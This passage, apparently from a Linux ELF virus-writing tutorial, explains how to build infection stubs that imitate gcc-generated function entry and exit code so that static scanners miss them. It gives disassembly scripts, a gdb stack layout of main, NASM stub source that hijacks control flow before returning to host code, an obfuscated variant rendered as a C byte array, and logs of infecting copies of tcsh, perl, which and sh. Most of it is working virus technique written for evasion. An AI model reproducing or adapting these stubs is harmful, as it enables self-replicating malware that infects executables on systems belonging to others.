A person who is more than casually interested in computers should be well schooled in machine language, since it is a fundamental part of a computer. | |
Donald Knuth |
The scanners in Turn the pages and Second scan check program layout for deviations. On a typical Linux distribution this yields good results since all programs are compiled and linked with the same set of tools. But there are legitimate reasons for executables to look different. Some rescue tools and non-free executables are linked statically to be independent of the target system. [1]
asmutils is a set of miscellaneous utilities written in assembly language, targeted on embedded systems and small distributions (e.g. installation or rescue disks); also it contains a small libc and a crypto library. It features the smallest possible size and memory requirements, the fastest speed, and offers fairly good functionality.
The next best approach is to follow the flow of control and verify visited code, starting from the entry point. Again this relies on a certain homogeneity of executables.
A very simple check is alignment. We handle that here and here. gcc(1) never starts functions on odd addresses. But neither VIT nor RST seem to care and put the infection after the last byte of the code segment.
The improved versions of patchEntryAddr in The entry point do a primitive check of the call to __libc_start_main. Since we leave the entry point unmodified we pass this test.
The next step is to check entry code of functions called by __libc_start_main, especially main. We are vulnerable to this.
patchEntryAddr 3.0 patches the call of __libc_start_main to invoke our virus code instead of main. To stay undetected our code should mimic the real thing. The disassembly of our first program shows everything we need to know. But then that listing was retrieved through heavy cheating.
To disassembly the main of a regular executable we extend the exercise of Disassemble it again, Sam. The script performs no kind of error checking. Feeding anything else than executables built by gcc(1) can have strange effects (like no output at all). There is also no limit on output length. In the examples below the Makefile building this document used head(1).
Command: src/stub_revisited/ndisasm.sh
#!/bin/sh
file=${1:-/bin/bash}
entry_point=$( od -j24 -An -td4 -N4 ${file} )
# 134512640 = 0x8048000
# 24 = offset to address of main in code of _start
main_point_ofs=$( expr ${entry_point} - 134512640 + 24 )
main=$( od -j${main_point_ofs} -An -td4 -N4 ${file} )
main_ofs=$( expr ${main} - 134512640 )
ndisasm -e ${main_ofs} -o ${main} -U ${file} |
First a simple test. Compare with above mentioned disassembly.
Output: out/redhat-linux-i386/stub_revisited/magic_elf.ndisasm
08048460 55 push ebp
08048461 89E5 mov ebp,esp
08048463 83EC0C sub esp,byte +0xc
08048466 6A03 push byte +0x3
08048468 6801800408 push dword 0x8048001
0804846D 6A01 push byte +0x1
0804846F E8A4FEFFFF call 0x8048318
08048474 31C0 xor eax,eax
08048476 89EC mov esp,ebp
08048478 5D pop ebp |
A look at tmp/doing_it_in_c/e3/sh_infected.
Output: out/redhat-linux-i386/stub_revisited/sh_infected.ndisasm
080C1280 6880940508 push dword 0x8059480
080C1285 9C pushf
080C1286 60 pusha
080C1287 E804000000 call 0x80c1290
080C128C 61 popa
080C128D 9D popf
080C128E C3 ret
080C128F 90 nop
080C1290 55 push ebp
080C1291 89E5 mov ebp,esp |
And this is plain /bin/bash.
Output: out/redhat-linux-i386/stub_revisited/sh.ndisasm
08059480 55 push ebp
08059481 89E5 mov ebp,esp
08059483 57 push edi
08059484 56 push esi
08059485 53 push ebx
08059486 83EC24 sub esp,byte +0x24
08059489 6A01 push byte +0x1
0805948B 68E0BA0C08 push dword 0x80cbae0
08059490 E8A3F9FFFF call 0x8058e38
08059495 83C410 add esp,byte +0x10 |
The first two instructions, making up three bytes, are constant. They are followed by an optional series of push to save special registers. Then comes a sub esp to reserve space for local variables. This also seems to be constant. Trivial In the language of mortals does not use local variables and still ends up with a sub.
For the exit code of /bin/bash we need a better filter.
Command: src/stub_revisited/ndisasm_ret.sh
#!/bin/sh
( src/stub_revisited/ndisasm.sh "$@" 2>&1 ) \
| sed -e '/ret/q' \
| tail |
Output: out/redhat-linux-i386/stub_revisited/sh_ret.ndisasm
08059B2C A12CB70C08 mov eax,[0x80cb72c]
08059B31 83EC0C sub esp,byte +0xc
08059B34 50 push eax
08059B35 E826030000 call 0x8059e60
08059B3A 8D65F4 lea esp,[ebp-0xc]
08059B3D 5B pop ebx
08059B3E 5E pop esi
08059B3F 5F pop edi
08059B40 5D pop ebp
08059B41 C3 ret |
I call this weird. It seems that 0xc byte are reserved on the stack just to stay unused. And why does one program use leave and the other pop ebp? A quote from the documentation [2] of nasm [2]:
LEAVE ; C9 [186]
LEAVE destroys a stack frame of the form created by the ENTER instruction [3] It is functionally equivalent to MOV ESP,EBP followed by POP EBP.
I guess that we are safe on that front. It's easy to check the existence of fixed byte values at a certain location (the entry code). But I doubt whether a static scanner could really realize whether a given exit code is just a dummy. Or what instruction a ret effectively jumps to.
Let's examine the stack of In the language of mortals just after the sub was executed. Note that you don't have to quote character "$" in interactive gdb(1) sessions. Instead of "\$sp" you type plain "$sp" to reference the stack pointer.
Command: src/stub_revisited/stack.sh
#!/bin/sh
file=${1:-${TMP}/magic_elf/magic_elf}
gdb ${file} -q <<EOT
break *0x08048466
run
backtrace
printf "esp=%08x ebp=%08x\n", \$esp, \$ebp
x/3xw \$sp
x/3xw \$sp + 12
x/3xw \$sp + 24
x/3xw \$sp + 36
EOT |
Output: out/redhat-linux-i386/stub_revisited/stack
(gdb) Breakpoint 1 at 0x8048466
(gdb) Starting program: /home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/magic_elf/magic_elf
Breakpoint 1, 0x08048466 in main ()
(gdb) #0 0x08048466 in main ()
#1 0x4003d316 in __libc_start_main (main=0x8048460 <main>, argc=1,
ubp_av=0xbffff6b4, init=0x80482e0 <_init>, fini=0x80484c0 <_fini>,
rtld_fini=0x4000d2fc <_dl_fini>, stack_end=0xbffff6ac)
at ../sysdeps/generic/libc-start.c:129
(gdb) esp=bffff63c ebp=bffff648
(gdb) 0xbffff63c: 0x08048441 0x080494f8 0x080495f8
(gdb) 0xbffff648: 0xbffff688 0x4003d316 0x00000001
(gdb) 0xbffff654: 0xbffff6b4 0xbffff6bc 0x080482f6
(gdb) 0xbffff660: 0x080484c0 0x00000000 0xbffff688
(gdb) |
The program was stopped at address 0x8048466 in function main, which was called from __libc_start_main. We already encountered file ../sysdeps/generic/libc-start.c in Use the Source, Luke. For sheer curiosity a look at line 129:
Command: src/stub_revisited/get_libc_start_main.sh
#!/bin/sh
output=${1:-src/stub_revisited/__libc_start_main}
stack=${2:-out/i386/stub_revisited/stack}
base_dir=$(
find /usr/src/redhat/SOURCES -maxdepth 1 -type d -name 'glibc-*'
)
# If the file is not in the place I'm used to on my machine
# we fall back to the copy shipped with this document.
# Forcing my usage of SRPMs gains nothing.
[ -d "${base_dir}" ] || exit 0
sed -n -e 's/:/ /g' -e 's/^ *at *//p' < ${stack} \
| ( read original_filename line_number
filename="${base_dir}/${original_filename#../}"
[ -e ${filename} ] || exit 0
start=$( expr ${line_number} - 8 )
end=$( expr ${line_number} + 4 )
( echo "# ${filename}"
echo ""
nl -ba -p ${filename} | sed -n -e "${start},${end} p"
) > ${output}
) |
Command: src/stub_revisited/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/sysdeps/generic/libc-start.c
121 if (init)
122 (*init) ();
123
124 #ifdef SHARED
125 if (__builtin_expect (_dl_debug_mask & DL_DEBUG_IMPCALLS, 0))
126 _dl_debug_printf ("\ntransferring control: %s\n\n", argv[0]);
127 #endif
128
129 exit ((*main) (argc, argv, __environ));
130 } |
Looks plausible.
Address | esp | ebp | Contents | Description |
---|---|---|---|---|
The top three values on the stack are just random junk. The instruction just before our break point decremented esp by 0xc = 12 to use that space for local variables. They are not initialized yet, though. | ||||
0xbffff63c | esp + 0 | ebp - 12 | 0x8048441 | random junk |
0xbffff640 | esp + 4 | ebp - 8 | 0x80494f8 | random junk |
0xbffff644 | esp + 8 | ebp - 4 | 0x80495f8 | random junk |
Everything further down - including the next two values - must be preserved for the host code. | ||||
0xbffff648 | esp + 12 | ebp + 0 | 0xbffff688 | saved ebp |
0xbffff64c | esp + 16 | ebp + 4 | 0x4003d316 | return address |
The next three values are the arguments of main. We declared the function as plain main() so gdb(1) does not know about these identifiers. | ||||
0xbffff650 | esp + 20 | ebp + 8 | 0x1 | argc |
0xbffff654 | esp + 24 | ebp + 12 | 0xbffff6b4 | argv |
0xbffff658 | esp + 28 | ebp + 16 | 0xbffff6bc | environ |
The next few values up to 0xbffff688 (saved ebp) are local variables of __libc_start_main. |
The new stub must fulfill a few constraints.
Both entry code and exit code is fixed.
The stack below ebp + 0 must not be modified.
After executing infectious code it must jump to the original host code.
Original host code expects the value of esp to be 0xbffff64c and the value of ebp to be 0xbffff688 (values are not constant, just given for illustration).
If we keep original exit code then we must modify the stack. The simpliest approach is to move the original ebp one position (4 bytes) down. Original entry code already reserved 12 unused bytes so we don't have to adjust esp. In the free space we store the address of host code.
Source: src/doing_it_in_c/i2/infection.asm
BITS 32
push ebp
mov ebp,esp
sub esp,byte 0xc
wrapper: ; replace -1 with address of original host code
mov eax,dword -1
xchg eax,[ebp]
sub ebp,byte 4
mov [ebp],eax
align 8
; dummy instruction to specify offset
push byte wrapper + 1 |
The following disassembly shows stub and the first function of the C part, called body. The stub ends with a few nop instructions to align its size. Flow of control just continues from stub to body. Since this is a regular C function it also has standard entry code. But this does not matter because standard exit code starts with a leave. No matter how much stuff was pushed on the stack between end of stub and exit code of body, the leave instruction will pop off the moved ebp. The following ret then jumps to host code.
Source: out/redhat-linux-i386/doing_it_in_c/e3i2.ndisasm
08049378 55 push ebp
08049379 89E5 mov ebp,esp
0804937B 83EC0C sub esp,byte +0xc
0804937E B8FFFFFFFF mov eax,0xffffffff
08049383 874500 xchg eax,[ebp+0x0]
08049386 83ED04 sub ebp,byte +0x4
08049389 894500 mov [ebp+0x0],eax
0804938C 90 nop
0804938D 90 nop
0804938E 90 nop
0804938F 90 nop
08049390 55 push ebp
08049391 89E5 mov ebp,esp
08049393 57 push edi
08049394 52 push edx
08049395 E82A000000 call 0x80493c4
0804939A 8D9000940408 lea edx,[eax+0x8049400]
080493A0 89D7 mov edi,edx
080493A2 FC cld
080493A3 31C0 xor eax,eax
080493A5 B9FFFFFFFF mov ecx,0xffffffff
080493AA F2AE repne scasb
080493AC F7D1 not ecx
080493AE 49 dec ecx
080493AF 51 push ecx
080493B0 52 push edx
080493B1 6A01 push byte +0x1
080493B3 6A04 push byte +0x4
080493B5 E81A000000 call 0x80493d4
080493BA 83C410 add esp,byte +0x10
080493BD 8B7DFC mov edi,[ebp-0x4]
080493C0 C9 leave
080493C1 C3 ret |
Output: out/redhat-linux-i386/doing_it_in_c/e3i2/cc
Infecting copy of /bin/tcsh... wrote 168 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 168 bytes, Ok
Infecting copy of /usr/bin/which... wrote 168 bytes, Ok
Infecting copy of /bin/sh... wrote 168 bytes, Ok |
Output: out/redhat-linux-i386/doing_it_in_c/test-e3i2
ELF is dead baby, ELF is dead.
/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/doing_it_in_c/e3i2/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF is dead baby, ELF is dead.
/usr/bin/which
ELF is dead baby, ELF is dead.
tcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF is dead baby, ELF is dead.
ELF is dead baby, ELF is dead.
GNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc. |
This is the same idea, only obfuscated by an intermediate call. Variations on this topic are endless.
Source: src/doing_it_in_c/i3/infection.asm
BITS 32
push ebp
mov ebp,esp
sub esp,byte 0xc
call wrapper
leave
ret
align 4
wrapper: ; replace -1 with address of original host code
mov eax,dword -1
xchg eax,[ebp]
sub ebp,byte 4
mov [ebp],eax
align 8
; dummy instruction to specify offset
push byte wrapper + 1
|
Source: out/redhat-linux-i386/doing_it_in_c/i3/infection.inc
const unsigned char Target::infection[]
__attribute__ (( aligned(8), section(".text") )) =
{
0x55, /* 00000000: push ebp */
0x89,0xE5, /* 00000001: mov ebp,esp */
0x83,0xEC,0x0C, /* 00000003: sub esp,byte +0xc */
0xE8,0x05,0x00,0x00,0x00, /* 00000006: call 0x10 */
0xC9, /* 0000000B: leave */
0xC3, /* 0000000C: ret */
0x90, /* 0000000D: nop */
0x90, /* 0000000E: nop */
0x90, /* 0000000F: nop */
0xB8,0xFF,0xFF,0xFF,0xFF, /* 00000010: mov eax,0xffffffff */
0x87,0x45,0x00, /* 00000015: xchg eax,[ebp+0x0] */
0x83,0xED,0x04, /* 00000018: sub ebp,byte +0x4 */
0x89,0x45,0x00, /* 0000001B: mov [ebp+0x0],eax */
0x90, /* 0000001E: nop */
0x90 /* 0000001F: nop */
};
enum { ENTRY_POINT_OFS = 0x11 }; |
Output: out/redhat-linux-i386/doing_it_in_c/e3i3/cc
Infecting copy of /bin/tcsh... wrote 192 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 192 bytes, Ok
Infecting copy of /usr/bin/which... wrote 192 bytes, Ok
Infecting copy of /bin/sh... wrote 192 bytes, Ok |
Output: out/redhat-linux-i386/doing_it_in_c/test-e3i3
ELF is dead baby, ELF is dead.
/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/doing_it_in_c/e3i3/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF is dead baby, ELF is dead.
/usr/bin/which
ELF is dead baby, ELF is dead.
tcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF is dead baby, ELF is dead.
ELF is dead baby, ELF is dead.
GNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc. |
[1] | |
[2] | http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.94 |
[3] | http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.27 |